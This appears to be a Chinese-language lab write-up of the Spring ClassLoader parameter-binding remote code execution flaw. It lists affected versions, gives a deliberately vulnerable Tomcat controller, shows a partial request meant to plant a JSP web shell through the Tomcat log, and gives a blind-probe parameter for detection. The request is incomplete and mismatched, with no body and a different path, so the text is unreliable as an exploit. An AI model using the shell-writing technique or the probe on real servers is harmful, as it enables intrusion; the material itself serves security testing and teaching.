- JDK 9+
- Spring 及其衍生框架
- 使用Tomcat部署spring项目
- 使用了POJO参数绑定
- Spring Framework 5.3.X < 5.3.18 、2.X < 5.2.20 或者其他版本
- Java 靶场
- JDK 11(必须9及9以上)
- Tomcat 8
public class HelloWorld {
private String message;
public String getMessage() {
return message;
}
public void setMessage(String message) {
this.message = message;
}
}
3. 再写个controller传参为这个实体类型
@RestController @RequestMapping("/spring")
public class SpringRce {
@RequestMapping("/rce")
public void vulnerable(HelloWorld model) {
}
}
4. 把项目打成war包放到Tomcat中部署运行
FIle — Project Structure
然后Build — Build Artifacts生成war包,放到Tomcat的webapps目录下,启动Tomcat
第一个包是通过Tomcat日志文件在webapps/ROOT下写一个jsp的shell
POST /java-sec/xstream HTTP/1.1 Cookie: JSESSIONID=0873A909194640CBAF9EEBC2283C6C97; XSRF- TOKEN=1d91ead1-6fa9-4f1d-b8c9-5cf57dc020b8; remember-me=YWRtaW46MTY1MjUxMTU2MjQ1MTo2M2U2NmNkZjdkOWNhZDAyMzMyMjhhMjAwN2NiZTc4YQ suffix: %>// c1: Runtime c2: <% DNT: 1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,**;q=0.8 Upgrade-Insecure-Requests: 1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15 Accept-Language: zh-CN,zh-Hans;q=0.9 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Length: 0四、测试中应用
黑盒盲打通过传一个classloader下的属性:class.module.classLoader.defaultAssertionStatus=123看服务端是否报异常
白盒的就是要满足上面的利用条件,或者找到POJO传参的controller再去尝试
